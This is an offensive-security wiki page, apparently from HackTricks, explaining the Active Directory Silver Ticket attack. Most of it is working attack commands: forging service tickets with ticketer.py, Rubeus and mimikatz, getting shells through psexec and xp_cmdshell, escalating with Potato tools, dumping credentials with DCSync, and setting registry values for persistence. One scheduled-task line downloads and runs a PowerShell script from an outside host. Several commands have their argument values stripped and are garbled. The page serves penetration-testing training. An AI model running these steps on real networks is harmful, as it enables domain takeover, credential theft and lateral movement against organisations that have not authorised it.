# Silver Ticket {{#include ../../banners/hacktricks-training.md}} ## Silver ticket The **Silver Ticket** attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on **acquiring the NTLM hash of a service account**, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, **impersonating any user**, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable. > [!WARNING] > Silver Tickets are less detectable than Golden Tickets because they only require the **hash of the service account**, not the krbtgt account. However, they are limited to the specific service they target. Moreover, just stealing the password of a user. Moreover, if you compromise an **account's password with a SPN** you can use that password to create a Silver Ticket impersonating any user to that service. For ticket crafting, different tools are employed based on the operating system: ### On Linux ```bash python ticketer.py -nthash -domain-sid -domain -spn export KRB5CCNAME=/root/impacket-examples/.ccache python psexec.py /@ -k -no-pass ``` ### On Windows ```bash # Using Rubeus ## /ldap option is used to get domain data automatically ## With /ptt we already load the tickt in memory rubeus.exe asktgs /user: [/rc4: /aes128: /aes256:] /domain: /ldap /service:cifs/domain.local /ptt /nowrap /printcmd # Create the ticket mimikatz.exe "kerberos::golden /domain: /sid: /rc4: /user: /service: /target:" # Inject the ticket mimikatz.exe "kerberos::ptt " .\Rubeus.exe ptt /ticket: # Obtain a shell .\PsExec.exe -accepteula \\ cmd ``` The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries. ### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM If you have the NTLM hash (or AES key) of a SQL service account (e.g., sqlsvc) you can forge a TGS for the MSSQL SPN and impersonate any user to the SQL service. From there, enable xp_cmdshell to execute commands as the SQL service account. If that token has SeImpersonatePrivilege, chain a Potato to elevate to SYSTEM. ```bash # Forge a silver ticket for MSSQLSvc (RC4/NTLM example) python ticketer.py -nthash -domain-sid -domain \ -spn MSSQLSvc/:1433 administrator export KRB5CCNAME=$PWD/administrator.ccache # Connect to SQL using Kerberos and run commands via xp_cmdshell impacket-mssqlclient -k -no-pass /administrator@:1433 \ -q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'" ``` - If the resulting context has SeImpersonatePrivilege (often true for service accounts), use a Potato variant to get SYSTEM: ```bash # On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato PrintSpoofer.exe -c "cmd /c whoami" # or GodPotato -cmd "cmd /c whoami" ``` More details on abusing MSSQL and enabling xp_cmdshell: {{#ref}} abusing-ad-mssql.md {{#endref}} Potato techniques overview: {{#ref}} ../windows-local-privilege-escalation/roguepotato-and-printspoofer.md {{#endref}} ## Available Services | Service Type | Service Silver Tickets | | ------------------------------------------ | -------------------------------------------------------------------------- | | WMI |

HOST

RPCSS

| | PowerShell Remoting |

HOST

HTTP

Depending on OS also:

WSMAN

RPCSS

| | WinRM |

HOST

HTTP

In some occasions you can just ask for: WINRM

| | Scheduled Tasks | HOST | | Windows File Share, also psexec | CIFS | | LDAP operations, included DCSync | LDAP | | Windows Remote Server Administration Tools |

RPCSS

LDAP

CIFS

| | Golden Tickets | krbtgt | Using **Rubeus** you may **ask for all** these tickets using the parameter: - `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ### Silver tickets Event IDs - 4624: Account Logon - 4634: Account Logoff - 4672: Admin Logon ## Persistence To avoid machines from rotating their password every 30 days set `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` or you could set `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` to a bigger value than 30days to indicate the rotation perdiod when the machines password should be rotated. ## Abusing Service tickets In the following examples lets imagine that the ticket is retrieved impersonating the administrator account. ### CIFS With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like: ```bash dir \\vulnerable.computer\C$ dir \\vulnerable.computer\ADMIN$ copy afile.txt \\vulnerable.computer\C$\Windows\Temp ``` You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**: {{#ref}} ../lateral-movement/psexec-and-winexec.md {{#endref}} ### HOST With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HOST + RPCSS With these tickets you can **execute WMI in the victim system**: ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic remote.computer.local list full /format:list ``` Find **more information about wmiexec** in the following page: {{#ref}} ../lateral-movement/wmiexec.md {{#endref}} ### HOST + WSMAN (WINRM) With winrm access over a computer you can **access it** and even get a PowerShell: ```bash New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC ``` Check the following page to learn **more ways to connect with a remote host using winrm**: {{#ref}} ../lateral-movement/winrm.md {{#endref}} > [!WARNING] > Note that **winrm must be active and listening** on the remote computer to access it. ### LDAP With this privilege you can dump the DC database using **DCSync**: ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **Learn more about DCSync** in the following page: {{#ref}} dcsync.md {{#endref}} ## References - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets) - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) - [https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027](https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027) - [HTB Sendai – 0xdf: Silver Ticket + Potato path](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html) {{#include ../../banners/hacktricks-training.md}}